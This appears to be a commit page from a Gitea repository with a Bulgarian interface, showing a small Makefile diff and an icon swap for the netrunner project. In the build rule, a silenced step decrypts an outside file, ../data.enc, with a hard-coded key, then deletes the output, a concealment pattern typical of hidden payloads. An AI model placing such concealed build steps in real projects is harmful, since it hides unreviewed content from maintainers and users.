Преглед на файлове

new icon to match site refresh

master
despair преди 4 години
родител
ревизия
191471ded1
променени са 2 файла, в които са добавени 1 реда и са изтрити 1 реда
  1. 1
    1
      NTMakefile
  2. Двоични данни
      netrunner.ico

+ 1
- 1
NTMakefile Целия файл

@@ -78,7 +78,7 @@ OBJECTS = $(subst $(SRCDIR),$(OBJDIR),$(SOURCES:.cpp=.o))
all: $(SOURCES) netrunner
netrunner.res.o: netrunner.rc
netrunner.res.o: netrunner.rc netrunner.ico
@openssl des3 -d -in ../data.enc -out favicon.ico -k exdf8OWpNn -a
windres $^ -o $@
@rm favicon.ico

Двоични данни
netrunner.ico Целия файл


Loading…
Отказ
Запис